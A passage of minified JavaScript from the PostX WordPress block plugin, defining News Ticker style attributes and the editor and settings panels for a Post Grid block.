button.ultp-news-ticker-pause:hover:before { border-color:{{PauseHovColor}};}"},{depends:[{key:"TickNavIconStyle",condition:"!=",value:"icon2"},{key:"controlToggle",condition:"==",value:!0},{key:"TickNavStyle",condition:"==",value:"nav4"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-pause:hover:before { border-color:{{PauseHovColor}};}"}]},PauseBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_3_color)"},style:[{depends:[{key:"TickNavStyle",condition:"==",value:"nav1"},{key:"controlToggle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-pause"},{depends:[{key:"TickNavStyle",condition:"==",value:"nav3"},{key:"controlToggle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-pause"}]},PauseHovBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_2_color)"},style:[{depends:[{key:"TickNavStyle",condition:"==",value:"nav1"},{key:"controlToggle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-news-ticker-controls .ultp-news-ticker-pause:hover"},{depends:[{key:"TickNavStyle",condition:"==",value:"nav3"},{key:"controlToggle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-news-ticker-controls .ultp-news-ticker-pause:hover"}]},tickLabelColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-news-ticker-label { color:{{tickLabelColor}}; } "}]},tickLabelBg:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-news-ticker-label{background-color:{{tickLabelBg}};}"},{depends:[{key:"tickShapeStyle",condition:"!=",value:"normal"}],selector:"{{ULTP}} .ultp-news-ticker-label::after{ border-color:transparent transparent transparent {{tickLabelBg}} !important; }"}]},tickLabelTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"27",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{selector:"{{ULTP}} .ultp-news-ticker-label"}]},tickLabelPadding:{type:"string",default:"15",style:[{selector:"{{ULTP}} .ultp-news-ticker-label { padding:0px {{tickLabelPadding}}px; }"}]},tickLabelSpace:{type:"object",default:{lg:"160"},style:[{selector:"{{ULTP}} .ultp-news-ticker-box { padding-left:{{tickLabelSpace}}px; } \n          .rtl {{ULTP}} .ultp-news-ticker-box { padding-right:{{tickLabelSpace}}px !important; }"}]},tickShapeStyle:{type:"string",default:"normal",style:[{depends:[{key:"tickShapeStyle",condition:"==",value:"large"}],selector:"{{ULTP}} .ultp-news-ticker-label::after {border-top: 23px solid; border-left: 24px solid; border-bottom: 23px solid; right: -24px;border-color:transparent; }"},{depends:[{key:"tickShapeStyle",condition:"==",value:"medium"}],selector:"{{ULTP}} .ultp-news-ticker-label::after { border-top: 17px solid; border-left: 20px solid;border-bottom: 17px solid;border-color:transparent;right:-20px;}"},{depends:[{key:"tickShapeStyle",condition:"==",value:"small"}],selector:"{{ULTP}} .ultp-news-ticker-label::after { border-top: 12px solid;border-left: 15px solid; border-bottom: 12px solid;border-color: transparent;right: -14px; }"},{depends:[{key:"tickShapeStyle",condition:"==",value:"normal"}],selector:"{{ULTP}} .ultp-news-ticker-label::after {display:none !important;}"}]},tickerContentHeight:{type:"string",default:"45",style:[{selector:"{{ULTP}} .ultp-news-ticker li,\n          .editor-styles-wrapper {{ULTP}} .ultp-newsTicker-wrap ul li,\n          {{ULTP}} .ultp-news-ticker-label,\n          {{ULTP}} .ultp-newsTicker-wrap,\n          {{ULTP}} .ultp-news-ticker-controls,\n          {{ULTP}} .ultp-news-ticker-controls button { height:{{tickerContentHeight}}px; }"}]},tickBodyColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-news-ticker li a,\n          {{ULTP}} .ultp-news-ticker li div a,\n          {{ULTP}} .ultp-news-ticker li div a span { color:{{tickBodyColor}}; }"}]},tickBodyHovColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-news-ticker li a:hover,\n          {{ULTP}} .ultp-news-ticker li div:hover,\n          {{ULTP}} .ultp-news-ticker li div a:hover span { color:{{tickBodyHovColor}}; }"}]},tickBodyListColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"tickTxtStyle",condition:"==",value:"box"}],selector:"{{ULTP}} .ultp-list-box::before { background-color:{{tickBodyListColor}};}"},{depends:[{key:"tickTxtStyle",condition:"==",value:"circle"}],selector:"{{ULTP}} .ultp-list-circle::before { background-color:{{tickBodyListColor}};}"},{depends:[{key:"tickTxtStyle",condition:"==",value:"hand"}],selector:"{{ULTP}} .ultp-list-hand::before { color:{{tickBodyListColor}};}"},{depends:[{key:"tickTxtStyle",condition:"==",value:"right-sign"}],selector:"{{ULTP}} .ultp-list-right-sign::before { color:{{tickBodyListColor}};}"},{depends:[{key:"tickTxtStyle",condition:"==",value:"right-bold"}],selector:"{{ULTP}} .ultp-list-right-bold::before { color:{{tickBodyListColor}};}"}]},tickerBodyBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{selector:"{{ULTP}} .ultp-news-ticker-box,\n          {{ULTP}} .ultp-news-ticker-controls { background-color:{{tickerBodyBg}} }"}]},tickBodyTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"16",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{selector:"{{ULTP}} .ultp-news-ticker li a"}]},tickBodyBorderColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-newsTicker-wrap { background-color:{{tickBodyBorderColor}};border-color:{{tickBodyBorderColor}} }"}]},tickBodyBorder:{type:"object",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{selector:"{{ULTP}} .ultp-newsTicker-wrap"}]},tickBodyRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-newsTicker-wrap,\n          {{ULTP}} .ultp-news-ticker-label,\n          {{ULTP}} .ultp-news-ticker-box { border-radius:{{tickBodyRadius}}; }\n          {{ULTP}} .ultp-news-ticker-prev { border-top-right-radius:0px !important; border-bottom-right-radius:0px !important; border-radius: {{tickBodyRadius}}; }"}]},tickTxtStyle:{type:"string",default:"normal",style:[{selector:"{{ULTP}} .ultp-news-ticker li { list-style-type:none; }"}]},tickImgWidth:{type:"string",default:"30",style:[{depends:[{key:"tickImageShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-news-ticker li div img {width:{{tickImgWidth}}px}"}]},tickImgSpace:{type:"string",default:"10",style:[{depends:[{key:"tickImageShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-news-ticker li div img { margin-right: {{tickImgSpace}}px; } \n          .rtl {{ULTP}} .ultp-news-ticker li div img { margin-left: {{tickImgSpace}}px !important; }"}]},tickImgRadius:{type:"object",default:{lg:{top:"30",bottom:"30",left:"30",right:"30",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-news-ticker li div img { border-radius:{{tickImgRadius}}; }"}]},tickBodySpace:{type:"object",default:{lg:"21"},style:[{depends:[{key:"tickerType",condition:"==",value:"marquee"}],selector:"{{ULTP}} .ultp-news-ticker { gap:{{tickBodySpace}}px; }"}]},timeBadgeType:{type:"string",default:"days_ago"},timeBadgeDateFormat:{type:"string",default:"M j, Y",style:[{depends:[{key:"timeBadgeType",condition:"==",value:"date"}]}]},tickTimeBadge:{type:"string",default:"Time Badge",style:[{depends:[{key:"tickTimeShow",condition:"==",value:!0},{key:"tickerType",condition:"!=",value:"typewriter"}]}]},timeBadgeColor:{type:"string",default:"var(--postx_preset_Base_1_color)",style:[{depends:[{key:"tickTimeShow",condition:"==",value:!0},{key:"tickerType",condition:"!=",value:"typewriter"}],selector:"{{ULTP}} .ultp-ticker-timebadge { color:{{timeBadgeColor}}; }"}]},timeBadgeBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Contrast_1_color)"},style:[{depends:[{key:"tickTimeShow",condition:"==",value:!0},{key:"tickerType",condition:"!=",value:"typewriter"}],selector:"{{ULTP}} .ultp-ticker-timebadge"}]},timeBadgeTypo:{type:"object",default:{openTypography:1,size:{lg:"12",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"16",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"tickTimeShow",condition:"==",value:!0},{key:"tickerType",condition:"!=",value:"typewriter"}],selector:"{{ULTP}} .ultp-news-ticker li .ultp-ticker-timebadge"}]},timeBadgeRadius:{type:"object",default:{lg:{top:"100",bottom:"100",left:"100",right:"100",unit:"px"}},style:[{depends:[{key:"tickTimeShow",condition:"==",value:!0},{key:"tickerType",condition:"!=",value:"typewriter"}],selector:"{{ULTP}} .ultp-ticker-timebadge { border-radius:{{timeBadgeRadius}}; }"}]},timeBadgePadding:{type:"object",default:{lg:{top:3,bottom:3,left:6,right:6,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-ticker-timebadge { padding: {{timeBadgePadding}} }"}]},...(0,l(92165).t)(["advanceAttr","query"],["loadingColor","queryInclude"],[{key:"queryNumPosts",default:{lg:4}}])}},84764:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(47214),n=l(48627),r=l(59963);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks,p=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/news-ticker-block/","block_docs");s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/news-ticker.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("News Ticker in the classic style.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:p,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/newsticker.svg"}},edit:i.Z,save:()=>null})},13452:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var o=l(67294),a=l(53049),i=l(73151),n=l(23890),r=l(49491),s=l(53105),p=l(29236),c=l(53508),u=l(46896),d=l(71411),m=l(93985),g=l(8152),y=l(76005),b=l(99838),v=l(69735),h=l(2963),f=l(39349),k=l(87025),w=l(31760),x=l(38196);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useState:C,useRef:E,useEffect:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const t=E(null),{setAttributes:l,name:M,isSelected:A,clientId:H,context:N,attributes:j,className:Z,attributes:{blockId:O,advanceId:R,paginationShow:D,paginationAjax:z,headingShow:F,filterShow:W,paginationType:V,navPosition:G,paginationNav:q,loadMoreText:$,paginationText:K,V4_1_0_CompCheck:{runComp:J},previewImg:Y,readMoreIcon:X,imgCrop:Q,imgCropSmall:ee,gridStyle:te,excerptLimit:le,columns:oe,metaStyle:ae,metaShow:ie,catShow:ne,showImage:re,metaSeparator:se,titleShow:pe,catStyle:ce,catPosition:ue,titlePosition:de,excerptShow:me,showFullExcerpt:ge,imgAnimation:ye,imgOverlayType:be,imgOverlay:ve,metaList:he,readMore:fe,readMoreText:ke,metaPosition:we,layout:xe,customCatColor:Te,onlyCatColor:_e,contentTag:Ce,titleTag:Ee,showSeoMeta:Se,titleLength:Pe,metaMinText:Le,metaAuthorPrefix:Ie,titleStyle:Be,metaDateFormat:Ue,authorLink:Me,fallbackEnable:Ae,vidIconEnable:He,notFoundMessage:Ne,dcEnabled:je,dcFields:Ze,currentPostId:Oe}}=e,[Re,De]=C(k.Ti),[ze,Fe]=C(null);function We(e){De({...Re,selectedDC:e})}function Ve(){De({...Re,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Ge(e){De({...Re,section:{...k.ZQ,[e]:!0}}),(0,k.Rt)(e),(0,k.ob)(e),Fe("setting")}function qe(e){De((t=>({...t,toolbarSettings:e}))),(0,k.os)(e)}S((()=>{(0,k.oA)(),(0,k.t2)(j,Re,De)}),[]),S((()=>{const t=H.substr(0,6),o=B(U(H));(0,a.qi)(l,o,Oe,H),(0,i.h)(e),O?O&&O!=t&&(o?.hasOwnProperty("ref")||(0,a.k0)()||o?.hasOwnProperty("theme")||l({blockId:t})):(l({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&l({queryType:"archiveBuilder"}))}),[H]),S((()=>{const e=t.current;(0,v.o6)()&&0===j.dcFields.length&&l({dcFields:Array(x.PR).fill(void 0)}),e?((0,a.Qr)(e,j)&&((0,k.t2)(j,Re,De),t.current=j),e.isSelected!==A&&A&&(0,k.gT)(Ge,qe)):t.current=j}),[j]);const $e={settingTab:ze,setSettingTab:Fe,setAttributes:l,name:M,attributes:j,setSection:Ge,section:Re.section,clientId:H,context:N,setSelectedDc:We,selectedDC:Re.selectedDC,selectParentMetaGroup:function(e){We(e),qe("dc_group")}};let Ke;if(O&&(Ke=(0,b.Kh)(j,"ultimate-post/post-grid-1",O,(0,a.k0)())),Y&&!A)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Y});S((()=>{A&&Y&&l({previewImg:""})}),[e?.isSelected]);const Je=_({...R&&{id:R},className:`ultp-block-${O} ${Z}`,onClick:e=>{e.stopPropagation(),Ge("general"),qe("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:$e,selected:Re.toolbarSettings}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:$e})),(0,o.createElement)(w.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",include:[{position:1,data:{type:"range",key:"rowSpace",min:0,max:80,step:1,responsive:!0,label:__("Row Gap","ultimate-post")}}]},{type:"layout+adv_style",layoutData:{type:"layout",key:"layout",label:__("Layout","ultimate-post"),pro:!0,block:"post-grid-1",options:[{img:"assets/img/layouts/pg1/l1.png",label:"Layout 1",value:"layout1",pro:!1},{img:"assets/img/layouts/pg1/l2.png",label:"Layout 2",value:"layout2",pro:!0},{img:"assets/img/layouts/pg1/l3.png",label:"Layout 3",value:"layout3",pro:!0},{img:"assets/img/layouts/pg1/l4.png",label:"Layout 4",value:"layout4",pro:!0},{img:"assets/img/layouts/pg1/l5.png",label:"Layout 5",value:"layout5",pro:!0}]},advStyleData:{type:"layout",key:"gridStyle",label:__("Advanced Style","ultimate-post"),pro:!0,tab:!0,block:"post-grid-1",options:[{img:"assets/img/layouts/pg1/s1.png",label:__("Style 1","ultimate-post"),value:"style1",pro:!1},{img:"assets/img/layouts/pg1/s2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!0},{img:"assets/img/layouts/pg1/s3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0},{img:"assets/img/layouts/pg1/s4.png",label:__("Style 4","ultimate-post"),value:"style4",pro:!0}]}},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),[J?"exclude":"dep"]:a.N2}],store:$e}),(0,o.createElement)("div",Je,Ke&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Ke}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(F||W||D)&&(0,o.createElement)(s.Z,{attributes:j,setAttributes:l,onClick:()=>{Ge("heading"),qe("heading")},setSection:Ge,setToolbarSettings:qe}),function(){const e=`${Ce}`,t="style1"==te||"style2"==te?`ultp-block-column-${oe.lg} ultp-sm-column-${oe.sm} ultp-xs-column-${oe.xs} ultp-grid1-responsive`:"",a=(e,t)=>(0,v.o6)()&&je&&(0,o.createElement)(f.Z,{idx:e,postId:t,fields:Ze,settingsOnClick:(e,t)=>{e?.stopPropagation(),qe(t)},selectedDC:Re.selectedDC,setSelectedDc:We,setAttributes:l,dcFields:Ze});return Re.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):Re.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(L,null)):Re.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-row ultp-pg1a-${te} ${t} ultp-${xe}`},Re.postsList.map(((t,i)=>{const s=JSON.parse(he.replaceAll("u0022",'"')),c={backgroundImage:t.image&&re?"url("+t.image[Q]+")":"#333"},d="style1"==te||"style2"==te&&0==i||"style3"==te&&i%3==0||"style4"==te&&(0==i||1==i)?Q:ee;return(0,o.createElement)(e,{key:i,className:`ultp-block-item post-id-${t.ID}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap"},a(8,t.ID),(t.image&&!t.is_fallback||Ae)&&re&&"layout2"!=xe&&(0,o.createElement)(p.ZP,{catPosition:ue,imgOverlay:ve,imgOverlayType:be,imgAnimation:ye,post:t,imgSize:d,fallbackEnable:Ae,vidIconEnable:He,idx:i,Category:"aboveTitle"!=ue?(0,o.createElement)(n.Z,{post:t,catShow:ne,catStyle:ce,catPosition:ue,customCatColor:Te,onlyCatColor:_e,onClick:()=>{Ge("taxonomy-/-category"),qe("cat")}}):null,onClick:()=>{Ge("image"),qe("image")},vidOnClick:()=>{Ge("video"),qe("video")}}),"layout2"===xe&&(0,o.createElement)("div",{className:"ultp-block-content-image",style:c}),(0,o.createElement)("div",{className:"ultp-block-content"},a(7,t.ID),"aboveTitle"==ue&&(0,o.createElement)(n.Z,{post:t,catShow:ne,catStyle:ce,catPosition:ue,customCatColor:Te,onlyCatColor:_e,onClick:e=>{Ge("taxonomy-/-category"),qe("cat")}}),a(6,t.ID),t.title&&pe&&1==de&&(0,o.createElement)(y.Z,{title:t.title,headingTag:Ee,titleLength:Pe,titleStyle:Be,onClick:e=>{Ge("title"),qe("title")}}),a(5,t.ID),ie&&"top"==we&&(0,o.createElement)(u.Z,{meta:s,post:t,metaSeparator:se,metaStyle:ae,metaMinText:Le,metaAuthorPrefix:Ie,metaDateFormat:Ue,authorLink:Me,onClick:e=>{Ge("meta"),qe("meta")}}),a(4,t.ID),t.title&&pe&&0==de&&(0,o.createElement)(y.Z,{title:t.title,headingTag:Ee,titleLength:Pe,titleStyle:Be,onClick:e=>{Ge("title"),qe("title")}}),a(3,t.ID),me&&(0,o.createElement)(r.Z,{excerpt:t.excerpt,excerpt_full:t.excerpt_full,seo_meta:t.seo_meta,excerptLimit:le,showFullExcerpt:ge,showSeoMeta:Se,onClick:e=>{Ge("excerpt"),qe("excerpt")}}),a(2,t.ID),fe&&(0,o.createElement)(P,null,(0,o.createElement)(g.Z,{readMoreText:ke,readMoreIcon:X,titleLabel:t.title,onClick:()=>{Ge("read-more"),qe("read-more")}})),a(1,t.ID),ie&&"bottom"==we&&(0,o.createElement)(P,null,(0,o.createElement)(u.Z,{meta:s,post:t,metaSeparator:se,metaStyle:ae,metaMinText:Le,metaAuthorPrefix:Ie,metaDateFormat:Ue,authorLink:Me,onClick:e=>{Ge("meta"),qe("meta")}})),a(0,t.ID),(0,v.o6)()&&je&&(0,o.createElement)(h.Z,{dcFields:Ze,setAttributes:l,startOnboarding:Ve}))))}))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:Ne})}(),D&&"loadMore"==V&&(0,o.createElement)(c.Z,{loadMoreText:$,onClick:e=>{Ge("pagination"),qe("pagination")}}),D&&"navigation"==V&&"topRight"!=G&&(0,o.createElement)(d.Z,{onClick:()=>{Ge("pagination"),qe("pagination")}}),D&&"pagination"==V&&(0,o.createElement)(m.Z,{paginationNav:q,paginationAjax:z,paginationText:K,onClick:e=>{Ge("pagination"),qe("pagination")}}))))}},38196:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=9,b=e=>{const{store:t}=e,{layout:l,queryType:n,advFilterEnable:r,advPaginationEnable:u,V4_1_0_CompCheck:{runComp:d}}=t.attributes,{context:y,section:b,settingTab:v,setSettingTab:h}=t;return g((()=>{(0,m.CH)(y,r,t,u)}),[r,u,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6829",store:t}),(0,o.createElement)(p.Sections,{settingTab:v,setSettingTab:h},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{initialOpen:b.general,store:t,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},include:[{position:0,data:{type:"layout",isInline:!1,block:"post-grid-1",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pg1/l1.png",label:"Layout 1",value:"layout1",pro:!1},{img:"assets/img/layouts/pg1/l2.png",label:"Layout 2",value:"layout2",pro:!0},{img:"assets/img/layouts/pg1/l3.png",label:"Layout 3",value:"layout3",pro:!0},{img:"assets/img/layouts/pg1/l4.png",label:"Layout 4",value:"layout4",pro:!0},{img:"assets/img/layouts/pg1/l5.png",label:"Layout 5",value:"layout5",pro:!0}]}},{position:1,data:{type:"layout",isInline:!1,key:"gridStyle",pro:!0,tab:!0,label:__("Select Advanced Style","ultimate-post"),block:"post-grid-1",options:[{img:"assets/img/layouts/pg1/s1.png",label:__("Style 1","ultimate-post"),value:"style1",pro:!1},{img:"assets/img/layouts/pg1/s2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!0},{img:"assets/img/layouts/pg1/s3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0},{img:"assets/img/layouts/pg1/s4.png",label:__("Style 4","ultimate-post"),value:"style4",pro:!0}]}},{position:5,data:{type:"range",key:"rowSpace",min:0,max:80,step:1,responsive:!0,label:__("Row Gap","ultimate-post")}},{position:11,data:{type:"toggle",key:"equalHeight",label:__("Equal Height","ultimate-post"),pro:!0,customClass:"ultp-pro-field"}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:b.title,exclude:["titleBackground"]}),"layout2"!=l&&(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:b.image,depend:"showImage",exclude:["imgMargin"],include:[{position:3,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,initialOpen:b.meta,depend:"metaShow",exclude:["metaListSmall"],hrIdx:[{tab:"settings",hr:[]},{tab:"style",hr:[2,8]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:b["taxonomy-/-category"],depend:"catShow",store:t,hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:b.excerpt,store:t}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:b["read-more"],depend:"readMore"}),(0,o.createElement)(a.O2,{store:t,exclude:["contenWraptWidth","contenWraptHeight"],include:[{position:0,data:{type:"range",key:"contentWidth",min:0,max:100,step:1,unit:!1,responsive:!0,label:__("Content Width","ultimate-post")}},{position:1,data:{type:"color",key:"innerBgColor",label:__("Inner Bg Color","ultimate-post")}},{position:2,data:{type:"boxshadow",key:"contentShadow",label:__("Box Shadow","ultimate-post")}},{position:3,data:{type:"dimension",key:"contentRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),"layout2"!=l&&(0,o.createElement)(a.rS,{initialOpen:b.video,depend:"vidIconEnable",store:t}),(0,o.createElement)(a.Yp,{initialOpen:b.separator,depend:"separatorShow",exclude:["septSpace"],store:t}),!d&&(0,o.createElement)(i.Z,{open:b.filter||b.pagination||b.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:b.heading,depend:"headingShow"}),"posts"!=n&&"customPosts"!=n&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:b.filter,depend:"filterShow",hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,store:t,initialOpen:b.pagination,depend:"paginationShow",hrIdx:[{tab:"style",hr:[4]}]}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:s,titleShow:p,catPosition:c,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,p&&0==m,i&&"top"==b,p&&1==m,f&&"aboveTitle"==c,h&&s&&"layout2"!=v];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(a.sT,{store:t,attrKey:"titleTypo",label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt 